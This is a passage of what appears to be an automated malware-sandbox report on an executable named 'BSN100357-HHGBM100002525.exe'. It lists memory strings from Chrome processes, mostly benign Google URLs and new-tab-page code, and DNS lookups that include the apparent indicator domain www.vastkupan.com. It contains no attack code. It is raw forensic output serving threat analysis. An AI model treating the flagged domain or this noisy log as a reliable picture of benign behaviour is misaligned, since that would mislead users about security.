#logo{background-image:url(icons/google_logo.svg)}#imageDoodle{cursor:pointer;outline:0}#imageDoodle[tabindex='-1']{cursor:auto}:host([doodle-boxed_]) #imageDoodle{background-color:var(--ntp-logo-box-color);border-radius:20px;padding:16px 24px}:host-context(.focus-outline-visible) #imageDoodle:focus{box-shadow:0 0 0 2px rgba(var(--google-blue-600-rgb),.4)}#imageContainer{display:flex;height:fit-content;position:relative;width:fit-content}#image{max-height:var(--ntp-logo-height);max-width:100%}:host([doodle-boxed_]) #image{max-height:128px}#animation{height:100%;pointer-events:none;position:absolute;width:100%}#doodle{position:relative}#shareButton{background-color:var(--color-new-tab-page-doodle-share-button-background,none);border:none;height:32px;min-width:32px;padding:0;position:absolute;width:32px;bottom:0}:host-context([dir=ltr]) #shareButton{right:-40px}:host-context([dir=rtl]) #shareButton{left:-40px}#shareButtonIcon{width:18px;height:18px;margin:7px;vertical-align:bottom;mask-image:url(chrome://new-tab-page/icons/share_unfilled.svg);background-color:var(--color-new-tab-page-doodle-share-button-i
Source: chrome.exe, 00000009.00000003.1452104931.0000610C01404000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.1451847628.0000610C01478000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.1451995424.0000610C01498000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: <!--_html_template_end_-->`}const FACEBOOK_APP_ID=738026486351791;class DoodleShareDialogElement extends CrLitElement{constructor(){super(...arguments);this.url={url:""}}static get is(){return"ntp-doodle-share-dialog"}static get styles(){return getCss$2()}render(){return getHtml$2.bind(this)()}static get properties(){return{title:{type:String},url:{type:Object}}}onFacebookClick_(){const url="https://www.facebook.com/dialog/share"+`?app_id=${FACEBOOK_APP_ID}`+`&href=${encodeURIComponent(this.url.url)}`+`&hashtag=${encodeURIComponent("#GoogleDoodle")}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kFacebook)}onTwitterClick_(){const url="https://twitter.com/intent/tweet"+`?text=${encodeURIComponent(`${this.title}\n${this.url.url}`)}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kTwitter)}onEmailClick_(){const url=`mailto:?subject=${encodeURIComponent(this.title)}`+`&body=${encodeURIComponent(this.url.url)}`;WindowProxy.getInstance().navigate(url);this.notifyShare_(DoodleShareChannel.kEmail)}onCopyClick_(){this.$.url.select();navigator.clipboard.writeText(this.url.url);this.notifyShare_(DoodleShareChannel.kLinkCopy)}onCloseClick_(){this.$.dialog.close()}notifyShare_(channel){this.fire("share",channel)}}customElements.define(DoodleShareDialogElement.is,DoodleShareDialogElement);let instance$3=null;function getCss$1(){return instance$3\|\|(instance$3=[...[getCss$4()],css`:host{--ntp-logo-height:168px;display:flex;flex-direction:column;flex-shrink:0;justify-content:flex-end;min-height:var(--ntp-logo-height)}:host([doodle-boxed_]){justify-content:flex-end}#logo{forced-color-adjust:none;height:92px;width:272px}:host([single-colored]) #logo{-webkit-mask-image:url(icons/google_logo.svg);-webkit-mask-repeat:no-repeat;-webkit-mask-size:100%;background-color:var(--ntp-logo-color)}:host(:not([single-colored])) #logo{background-image:url(icons/google_logo.svg)}#imageDoodle{cursor:pointer;outline:0}#imageDoodle[tabindex='-1']{cursor:auto}:host([doodle-boxed_]) #imageDoodle{background-color:var(--ntp-logo-box-color);border-radius:20px;padding:16px 24px}:host-context(.focus-outline-visible) #imageDoodle:focus{box-shadow:0 0 0 2px rgba(var(--google-blue-600-rgb),.4)}#imageContainer{display:flex;height:fit-content;position:relative;width:fit-content}#image{max-height:var(--ntp-logo-height);max-width:100%}:host([doodle-boxed_]) #image{max-height:128px}#animation{height:100%;pointer-events:none;position:absolute;width:100%}#doodle{position:relative}#shareButton{background-color:var(--color-new-tab-page-doodle-share-button-background,none);border:none;height:32px;min-width:32px;padding:0;position:absolute;width:32px;bottom:0}:host-context([dir=ltr]) #shareButton{right:-40px}:host-context([dir=rtl]) #shareButton{left:-40px}#shareButtonIcon{width:18px;height:18px;margin:7px;vertical-align:bottom;mask-image:url(chrome://new-tab-page/icons/share_unfilled.svg);background-color:var(--color-new-tab-page-doodle-share-button-i

Source: global traffic	DNS traffic detected: DNS query: www.vastkupan.com
Source: global traffic	DNS traffic detected: DNS query: www.google.com
Source: global traffic	DNS traffic detected: DNS query: clients2.googleusercontent.com
Source: global traffic	DNS traffic detected: DNS query: ogads-pa.clients6.google.com
Source: global traffic	DNS traffic detected: DNS query: apis.google.com
Source: global traffic	DNS traffic detected: DNS query: play.google.com

Source: unknown

HTTP traffic detected: POST /log?format=json&hasfast=true HTTP/1.1host: play.google.comcontent-length: 371sec-ch-ua-platform: "Windows"content-encoding: gzipuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"content-type: application/binarysec-ch-ua-mobile: ?0accept: */*origin: chrome-untrusted://new-tab-pagex-client-data: CMHxygE=sec-fetch-site: cross-sitesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-GB,en-US;q=0.9,en;q=0.8priority: u=1, i

Source: chrome.exe, 0000000C.00000000.1482607974.00000214F5822000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://fontfabrik.com
Source: chrome.exe, 0000000C.00000000.1488602278.00000F3C00069000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.1616596865.00004FCC00538000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000011.00000000.1587584119.00004FCC00538000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000012.00000000.1631009401.0000174400529000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://google.com/
Source: chrome.exe, 0000000C.00000000.1488602278.00000F3C00069000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.1616596865.00004FCC00538000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000011.00000000.1587584119.00004FCC00538000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000012.00000000.1631009401.0000174400529000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://google.com/a-co
Source: BSN100357-HHGBM100002525.exe, 00000000.00000002.1379541094.0000000002B1E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://james.newtonking.com/projects/json
Source: chrome.exe, 0000000C.00000000.1499280638.00000F3C00CED000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000012.00000000.1633724909.0000174400728000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://lists.w3.org/Archives/Public/public-svg-wg/2008JulSep/0347.html
Source: BSN100357-HHGBM100002525.exe, 00000000.00000002.1379541094.0000000002961000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: chrome.exe, 00000009.00000003.1747947431.0000610C02330000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.1748619590.0000610C01404000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000000.1635404636.0000174400920000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.broofa.com
Source: chrome.exe, 0000000C.00000000.1494090983.00000F3C005C0000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000011.00000000.1588195770.00004FCC005CC000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.1617222760.00004FCC005CC000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000012.00000000.1632163567.00001744005C4000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://accountcapabilities-pa.googleapis.com/
Source: chrome.exe, 0000000C.00000000.1494270064.00000F3C005E4000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.1617765376.00004FCC00620000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000011.00000000.1588661382.00004FCC00620000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000012.00000000.1632445419.000017440060C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://accountcapabilities-pa.googleapis.com/v1/accountcapabilities:batchGet
Source: chrome.exe, 00000012.00000000.1632445419.000017440060C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://accountcapabilities-pa.googleapis.com/v1/accountcapabilities:batchGetd
Source: chrome.exe, 0000000C.00000000.1494270064.00000F3C005E4000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://accountcapabilities-pa.googleapis.com/v1/accountcapabilities:batchGetui
Source: chrome.exe, 0000000C.00000000.1494023335.00000F3C0059C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.1617121892.00004FCC005B0000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000011.00000000.1588052234.00004FCC005B0000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000012.00000000.1631633905.000017440058C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/
Source: chrome.exe, 0000000C.00000000.1494090983.00000F3C005C0000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000011.00000000.1588195770.00004FCC005CC000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.1617222760.00004FCC005CC000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000012.00000000.1632163567.00001744005C4000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/AccountChooser
Source: chrome.exe, 0000000C.00000000.1494090983.00000F3C005C0000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000011.00000000.1588195770.00004FCC005CC000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.1617222760.00004FCC005CC000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000012.00000000.1632163567.00001744005C4000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/AddSession
Source: chrome.exe, 0000000C.00000000.1494023335.00000F3C0059C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000011.00000000.1587972340.00004FCC0059C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.1617045741.00004FCC0059C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000012.00000000.1631633905.000017440058C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/GetCheckConnectionInfo
Source: chrome.exe, 0000000C.00000000.1494023335.00000F3C0059C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000011.00000000.1587972340.00004FCC0059C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.1617045741.00004FCC0059C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000012.00000000.1631633905.000017440058C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/ListAccounts?json=standard
Source: chrome.exe, 0000000C.00000000.1494090983.00000F3C005C0000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000011.00000000.1588195770.00004FCC005CC000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.1617222760.00004FCC005CC000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000012.00000000.1632163567.00001744005C4000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/Logout
Source: chrome.exe, 0000000C.00000000.1494090983.00000F3C005C0000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000011.00000000.1588195770.00004FCC005CC000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.1617222760.00004FCC005CC000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000012.00000000.1632163567.00001744005C4000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/RotateBoundCookies
Source: chrome.exe, 0000000C.00000000.1494090983.00000F3C005C0000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000011.00000000.1588195770.00004FCC005CC000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.1617222760.00004FCC005CC000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000012.00000000.1632163567.00001744005C4000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/chrome/blank.html
Source: chrome.exe, 0000000C.00000000.1494023335.00000F3C0059C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000011.00000000.1587972340.00004FCC0059C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.1617045741.00004FCC0059C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000012.00000000.1631633905.000017440058C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/embedded/reauth/chromeos
Source: chrome.exe, 0000000C.00000000.1494023335.00000F3C0059C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000011.00000000.1587972340.00004FCC0059C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.1617045741.00004FCC0059C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000012.00000000.1631633905.000017440058C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/embedded/setup/chrome/usermenu
Source: chrome.exe, 0000000C.00000000.1494023335.00000F3C0059C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000011.00000000.1587972340.00004FCC0059C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.1617045741.00004FCC0059C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000012.00000000.1631633905.000017440058C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/embedded/setup/kidsignin/chromeos
Source: chrome.exe, 0000000C.00000000.1494023335.00000F3C0059C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/embedded/setup/kidsignin/chromeosui
Source: chrome.exe, 0000000C.00000000.1494023335.00000F3C0059C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000011.00000000.1587972340.00004FCC0059C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.1617045741.00004FCC0059C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000012.00000000.1631633905.000017440058C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/embedded/setup/kidsignup/chromeos
Source: chrome.exe, 0000000C.00000000.1494023335.00000F3C0059C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000011.00000000.1587972340.00004FCC0059C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.1617045741.00004FCC0059C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000012.00000000.1631633905.000017440058C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/embedded/setup/v2/chromeos
Source: chrome.exe, 00000011.00000000.1587972340.00004FCC0059C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.1617045741.00004FCC0059C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/embedded/setup/v2/chromeosension.
Source: chrome.exe, 0000000C.00000000.1494023335.00000F3C0059C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/embedded/setup/v2/chromeospage/.
Source: chrome.exe, 0000000C.00000000.1494023335.00000F3C0059C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000011.00000000.1587972340.00004FCC0059C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.1617045741.00004FCC0059C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000012.00000000.1631633905.000017440058C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/embedded/setup/windows
Source: chrome.exe, 0000000C.00000000.1494023335.00000F3C0059C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000011.00000000.1587972340.00004FCC0059C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.1617045741.00004FCC0059C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000012.00000000.1631633905.000017440058C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/embedded/xreauth/chrome
Source: chrome.exe, 0000000C.00000000.1494023335.00000F3C0059C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000011.00000000.1587972340.00004FCC0059C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.1617045741.00004FCC0059C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000012.00000000.1631633905.000017440058C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/encryption/unlock/desktop
Source: chrome.exe, 0000000C.00000000.1488797695.00000F3C0007C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.1612461006.00004FCC0007C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000011.00000000.1579594387.00004FCC0007C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000012.00000000.1625494478.000017440007C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/encryption/unlock/desktop?kdi=CAIaDgoKY2hyb21lc3luYxAB
Source: chrome.exe, 00000012.00000000.1625494478.000017440007C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/encryption/unlock/desktop?kdi=CAIaDgoKY2hyb21lc3luYxABdtrusteddd
Source: chrome.exe, 00000011.00000002.1612461006.00004FCC0007C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000011.00000000.1579594387.00004FCC0007C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/encryption/unlock/desktop?kdi=CAIaDgoKY2hyb21lc3luYxABechannel.
Source: chrome.exe, 00000012.00000000.1629715817.0000174400479000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000012.00000000.1621084438.000001E3002C0000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000012.00000000.1635542748.000017440095C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/o/oauth2/auth
Source: chrome.exe, 00000012.00000000.1621084438.000001E3002C0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/o/oauth2/authU
Source: chrome.exe, 00000012.00000000.1629715817.0000174400479000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000012.00000000.1621084438.000001E3002C0000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000012.00000000.1635542748.000017440095C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/o/oauth2/postmessageRelay
Source: chrome.exe, 00000012.00000000.1621084438.000001E3002C0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/o/oauth2/postmessageRelayU
Source: chrome.exe, 0000000C.00000000.1494090983.00000F3C005C0000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000011.00000000.1588195770.00004FCC005CC000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.1617222760.00004FCC005CC000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000012.00000000.1632163567.00001744005C4000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/o/oauth2/revoke
Source: chrome.exe, 0000000C.00000000.1494090983.00000F3C005C0000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000011.00000000.1588195770.00004FCC005CC000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.1617222760.00004FCC005CC000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000012.00000000.1632163567.00001744005C4000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/oauth/multilogin
Source: chrome.exe, 0000000C.00000000.1494090983.00000F3C005C0000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000011.00000000.1588195770.00004FCC005CC000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.1617222760.00004FCC005CC000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000012.00000000.1632163567.00001744005C4000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/samlredirect
Source: chrome.exe, 0000000C.00000000.1494023335.00000F3C0059C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000011.00000000.1587972340.00004FCC0059C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.1617045741.00004FCC0059C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000012.00000000.1631633905.000017440058C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/signin/chrome/sync?ssp=1
Source: chrome.exe, 00000009.00000003.1487099247.0000610C018F0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.1458108971.0000610C01604000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.1487225878.0000610C015D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000000.1628611842.00001744003E8000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000012.00000000.1629715817.0000174400479000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000012.00000000.1635404636.0000174400920000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000012.00000000.1620592610.000001E300100000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000012.00000000.1628611842.00001744003EE000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000012.00000000.1635542748.000017440095C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://apis.google.com
Source: chrome.exe, 00000012.00000003.1849210701.000001E300040000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://apis.google.com/_/scs/abc-static/_/js/k=gapi.gapi.en.citSWp3NP7U.O/m=gapi_iframes
Source: chrome.exe, 00000012.00000000.1620592610.000001E300100000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://apis.google.comU
Source: chrome.exe, 00000009.00000003.1518703844.0000610C0104C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.1488517237.0000610C003D4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://assets.adobedtm.com
Source: chrome.exe, 00000009.00000003.1458349676.0000610C01478000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.1486603570.0000610C004A8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.1458260163.0000610C01468000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.1486703514.0000610C01498000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000C.00000000.1497950032.00000F3C00AC8000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000C.00000000.1497385618.00000F3C00934000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://calendar.google.com
Source: chrome.exe, 00000009.00000003.1748619590.0000610C01404000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/mathjax/;secured-pixel.com;Can
Source: chrome.exe, 00000009.00000003.1747558171.0000610C0116C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.ico
Source: chrome.exe, 00000012.00000000.1627142529.00001744001E4000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000012.00000000.1630609921.00001744004E4000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore
Source: chrome.exe, 0000000C.00000000.1484936243.0000022000028000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000C.00000000.1496966561.00000F3C00878000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000C.00000000.1483735552.0000021E00040000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=en-GB
Source: chrome.exe, 0000000C.00000003.1754083065.0000021E00040000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000C.00000000.1483735552.0000021E00040000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=en-GBQ
Source: chrome.exe, 0000000C.00000000.1484775543.0000022000008000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=en-GBhttps://chrome.google.com/webstore?hl=en-GBhttps://chrome
Source: chrome.exe, 00000009.00000003.1642845988.0000610C011CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.1457336781.0000610C01220000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.1519649114.0000610C011CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.1518621188.0000610C01220000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.1449759585.0000610C011CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000C.00000000.1489839768.00000F3C001E4000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.1615261179.00004FCC00470000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000011.00000000.1581009164.00004FCC001E4000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000011.00000000.1583663875.00004FCC00470000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000012.00000000.1627142529.00001744001E9000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000012.00000000.1627142529.00001744001E4000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstoreLDDiscover
Source: chrome.exe, 0000000B.00000002.1469099908.000030080004C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000C.00000000.1487187700.00000F380004C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000011.00000000.1577458301.00004FC80004C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000012.00000000.1623521160.000017400004C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstorehttps://chromewebstore.google.com/6EAED1924DB611B6EEF2A664BD077BE7
Source: chrome.exe, 00000009.00000003.1489292104.0000610C01AAC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chromekanonymity-pa.googleapis.com/2%
Source: chrome.exe, 00000009.00000003.1489292104.0000610C01AAC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chromekanonymityauth-pa.googleapis.com/2$
Source: chrome.exe, 00000009.00000003.1489292104.0000610C01AAC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chromekanonymityquery-pa.googleapis.com/2O
Source: chrome.exe, 0000000B.00000002.1469099908.000030080004C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000C.00000000.1487187700.00000F380004C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000011.00000000.1577458301.00004FC80004C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000012.00000000.1623521160.000017400004C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://chromewebstore.google.com/
Source: chrome.exe, 0000000C.00000000.1494090983.00000F3C005C0000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000011.00000000.1588195770.00004FCC005CC000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.1617222760.00004FCC005CC000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000012.00000000.1632163567.00001744005C4000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://classroom.googleapis.com/
Source: chrome.exe, 0000000F.00000000.1535771397.00001A500008C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000F.00000000.1535700043.00001A5000078000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://clients2.google.com/cr/report
Source: chrome.exe, 0000000F.00000000.1536454683.00005BB00002C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000F.00000000.1535433293.00001A500002C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://clients2.google.com/cr/report--annotation=channel=--annotation=plat=Win64--annotation=prod=C
Source: chrome.exe, 0000000F.00000000.1535771397.00001A500008C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://clients2.google.com/cr/reportrAPPDATA=C:
Source: chrome.exe, 00000009.00000003.1519936534.0000610C019C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.1519750662.0000610C01A28000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.1519407283.0000610C003CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.1516917913.0000610C01B9C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.1515480883.0000610C01B18000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.1747339596.0000610C0217C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.1517146415.0000610C01BB0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.1516039773.0000610C01B4C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.1517304811.0000610C01BC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.1488517237.0000610C003CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.1517260747.0000610C01BC0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 